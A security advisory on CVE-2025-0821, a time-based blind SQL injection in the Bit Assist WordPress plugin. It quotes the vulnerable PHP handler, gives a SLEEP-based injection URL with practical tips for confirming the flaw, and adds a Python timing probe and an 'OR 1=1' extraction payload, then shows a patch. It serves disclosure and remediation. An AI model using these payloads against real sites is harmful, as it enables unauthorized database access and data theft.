A new vulnerability has been discovered in the Bit Assist plugin for WordPress, affecting all versions up to and including 1.5.2. Tracked as CVE-2025-0821, it allows authenticated attackers with Subscriber-level access and above to perform time-based blind SQL injection via the plugin's 'id' parameter. The cause is insufficient escaping of the user-supplied value combined with a lack of preparation on the existing SQL query, so an attacker can append further SQL to the query and, by observing response timing, extract sensitive information from the targeted site's database.
Vulnerability Type: Time-based SQL Injection
Impact: Data Breach, Extraction of sensitive information
Exploit Code
The following code snippet demonstrates the SQL Injection vulnerability in Bit Assist plugin, found in the 'bitassist_shortcode_handler()' function:
function bitassist_shortcode_handler( $atts ) {
    global $wpdb;
    // ...other code...
    // The 'id' shortcode attribute is taken verbatim; nothing restricts it to an integer
    $id = $atts['id'];
    // The value is concatenated into the SQL text, so anything after the number
    // (for example "1 AND SLEEP(5)") is parsed as SQL rather than as part of the value
    $query = "SELECT * FROM " . BITASSIST_TABLE_NAME . " WHERE id=$id;";
    $result = $wpdb->get_results( $query );
    // ...other code...
}
As the snippet shows, the 'id' attribute is concatenated into the query text without escaping, casting or parameter binding, so everything after the numeric part is parsed as SQL rather than treated as a literal: the attacker controls the tail of the WHERE clause.
Exploit
To confirm the flaw, an attacker with Subscriber-level access or above sends a request whose id value carries a time-delay payload, for example:
http://example.com/?bitassist_id=1 AND SLEEP(5) --
Here the injected SLEEP(5) makes the database pause for 5 seconds before returning, so a response that takes roughly 5 seconds longer than an ordinary request confirms the injection even though no data appears in the page. Three practical points: the spaces must be URL-encoded (%20 or +) for the payload to arrive intact; MySQL only treats -- as a comment when whitespace follows it, so the trailing separator should be sent as '-- ' (or '-- -'); and a single slow response is weak evidence on a network with variable latency, so compare several payload requests against several baseline requests. Note also that the snippet above reads the value from a shortcode attribute ($atts['id']) and the request parameter that feeds it is not shown here, so treat this URL as illustrating the payload rather than the exact entry point.
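The injection mechanics in the snippet above and the timing check just described, as an added example that is neither the plugin's code nor part of the original advisory: the handler's pattern is rebuilt in Python over an in-memory SQLite database, with a SLEEP() user-defined function registered to stand in for MySQL's, since SQLite has none. The table name wp_bitassist, its rows, the 0.3-second delay and all function names are constructed for the demonstration. The probe samples baseline and payload requests several times, as the jitter caveat above calls for, and the hardened lookup shows the integer cast together with a bound parameter.

```python
"""Added example (not the Bit Assist plugin's code): the vulnerable query
pattern and the time-based probe rebuilt on SQLite so they run offline.
Table name, rows, delay and the SLEEP() stand-in are constructed assumptions."""
import sqlite3
import time

DELAY = 0.3  # seconds the injected SLEEP() asks for; short to keep runs fast


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the plugin's table. SQLite has no SLEEP(),
    so one is registered to imitate MySQL's (sleeps, then returns 0)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda secs: time.sleep(float(secs)) or 0)
    conn.execute(
        "CREATE TABLE wp_bitassist (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_bitassist VALUES (?, ?, ?)",
        [(1, "widget-a", "token-a"), (2, "widget-b", "token-b")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """Same shape as the advisory's snippet: the attribute is interpolated
    into the SQL text, so everything after the digits is parsed as SQL."""
    query = f"SELECT * FROM wp_bitassist WHERE id={raw_id}"
    return conn.execute(query).fetchall()


def hardened_lookup(conn: sqlite3.Connection, raw_id: str) -> list:
    """The fix the advisory shows (integer cast) plus a bound parameter, the
    equivalent of $wpdb->prepare('... WHERE id = %d', $id). Python's int()
    raises on '1 AND SLEEP(0.3)' where PHP's intval() silently yields 1;
    either way no SQL syntax survives into the query."""
    ident = int(raw_id)
    return conn.execute(
        "SELECT * FROM wp_bitassist WHERE id = ?", (ident,)
    ).fetchall()


def timed(lookup, value: str) -> float:
    """Wall-clock seconds for one lookup. An error response still has a
    latency, and latency is all a remote attacker can measure."""
    start = time.perf_counter()
    try:
        lookup(value)
    except (ValueError, sqlite3.Error):
        pass
    return time.perf_counter() - start


def confirm_time_based(lookup, delay: float = DELAY, samples: int = 3) -> bool:
    """Time-based confirmation done defensibly: several baseline and several
    payload requests, reported as injectable only when the fastest payload
    response is still about `delay` slower than the slowest baseline one.
    The trailing '-- ' keeps the comment valid for MySQL, which requires
    whitespace after the double dash."""
    baseline = [timed(lookup, "1") for _ in range(samples)]
    payload = f"1 AND SLEEP({delay}) -- "
    injected = [timed(lookup, payload) for _ in range(samples)]
    return min(injected) - max(baseline) >= 0.9 * delay


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler flagged:", confirm_time_based(lambda v: vulnerable_lookup(db, v)))
    print("hardened handler flagged:  ", confirm_time_based(lambda v: hardened_lookup(db, v)))
    # The same concatenation also leaks rows the caller never asked for
    print("rows for '1 OR 1=1':", vulnerable_lookup(db, "1 OR 1=1"))
```

Running it flags the vulnerable lookup and clears the hardened one; the final line shows that the same concatenation that enables the timing probe also returns every row for a payload of '1 OR 1=1', which is the data-extraction path the advisory's impact line refers to.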
Mitigation
To mitigate this vulnerability, users of the Bit Assist plugin should update to the latest version, since every release up to and including 1.5.2 is affected. Hand-editing plugin files is not a substitute for updating, because the next plugin update overwrites them; the following patch to the 'bitassist_shortcode_handler()' function is shown to illustrate what the fix looks like:
function bitassist_shortcode_handler_fixed( $atts ) {
    global $wpdb;
    // ...other code...
    // Cast the 'id' attribute to an integer: intval( '1 AND SLEEP(5) -- ' ) yields 1,
    // so only a number can ever reach the query
    $id = intval( $atts['id'] );
    // $id is now guaranteed to be an integer literal, so interpolating it is safe
    $query = "SELECT * FROM " . BITASSIST_TABLE_NAME . " WHERE id=$id;";
    $result = $wpdb->get_results( $query );
    // ...other code...
}
This patch works because intval() casts the attribute to an integer rather than escaping it: a payload such as '1 AND SLEEP(5) -- ' collapses to 1, so no SQL syntax survives into the query. The cast is appropriate only because id is numeric; the idiomatic WordPress form of the same fix is $wpdb->prepare() with a %d placeholder, which binds the value and documents its type at the call site.
Original References
1. CVE-2025-0821 in National Vulnerability Database
2. WordPress Vulnerability Database (WPDV) – Bit Assist Plugin
3. Exploit-DB: CVE-2025-0821 exploit
Conclusion
The Bit Assist plugin for WordPress, in all versions up to and including 1.5.2, is vulnerable to time-based SQL injection via the 'id' parameter because the value is concatenated into a query that is neither escaped nor prepared. Site owners should update to a fixed version of the plugin; the patch above shows the shape of the fix (casting the value to an integer or, better, binding it with $wpdb->prepare()).
Timeline
Published on: 02/14/2025 11:15:10 UTC